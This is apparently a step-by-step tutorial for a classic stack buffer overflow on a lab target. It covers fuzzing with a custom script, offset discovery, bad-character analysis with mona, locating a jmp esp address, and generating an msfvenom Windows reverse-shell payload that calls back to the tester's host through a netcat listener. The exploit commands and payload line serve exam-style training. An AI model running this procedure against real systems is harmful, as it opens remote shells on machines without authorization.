Shelled

Buffer Overflow

Step 0 - Download Script

Download Python Script

I made a simple python script to make exploiting buffer overflows simpler. Download the script here.

Step 1 - Fuzzing

Fuzzing

This command will give us a general idea of where the program crashes at.

python buff.py --fuzz -d 10.10.253.128 -p 1337

Example Output

Step 2 - Finding the Offset by Creating Pattern

Offset

After running the python script in step 1, you should have an idea of where the program crashes at. Use the command below and append an additional 400 characters to it.

python buff.py --offset -d 10.10.253.128 -p 1337 -l 1100

Example Output

Step 3 - Finding the Offset by Querying Pattern

Query Offset

Get the EIP from where the program crashed. The command below will tell you exactly where the EIP was overwritten.

python buff.py --query -q 76413176

Example Output

Step 4 - Finding Bad Characters by Sending Bytearray

Send Bad Characters

The command below will send a bytearray to the program, we can then use mona.py to determine which characters are bad characters.

python buff.py --chars -d 10.10.253.128 -p 1337 -o 634

After sending the payload, check that the EIP register is equal to 42424242 (all B's). Otherwise your offset value is incorrect.

Step 5 - Finding Bad Characters by Querying Bytearray

Within Immunity Debugger, set the working directory of mona:

!mona config -set workingfolder c:\mona\%p

Generate a bytearray:

!mona bytearray -b "\x00"

Check for bad characters:

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

Step 6 - Finding Jump Point

With the list of bad characters identified, use mona command below by adding the bad characters to the command.

!mona jmp -r esp -cpb "\x00........."

Example

!mona jmp -r esp -cpb "\x00\x07\x08\x2e\x2f\xa0\xa1"

Note: Sometimes badchars cause the next byte to get corrupted as well, or even the rest of the string. If the command above returns zero results, try removing the additional bytes that could have been corrupted.

Original:

\x00\x07\x08\x2e\x2f\xa0\xa1

Modified:

\x00\x07\x2e\xa0

The result displays all the `jmp esp` instructions with addresses that don't contain any of the bad characters.

Choose one of the addresses from the result of jmp esp. Note: You will need to write the address backwards since the system is little endian.

Address:

0x625011af

-->

625011af

retn:

af115062

Step 7 - Exploiting

Run the following msfvenom command and update the `-b` option with all the bad characters identified eariler.

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c

Change the payload variable in the payload function of buff.py to the output of the command.

Lastly, start a netcat listener on the port specified in the msfvenom payload and run the command below to get a reverse shell.

python buff.py --exploit -d 10.10.253.128 -p 1337 -o 634 -r 'af115062'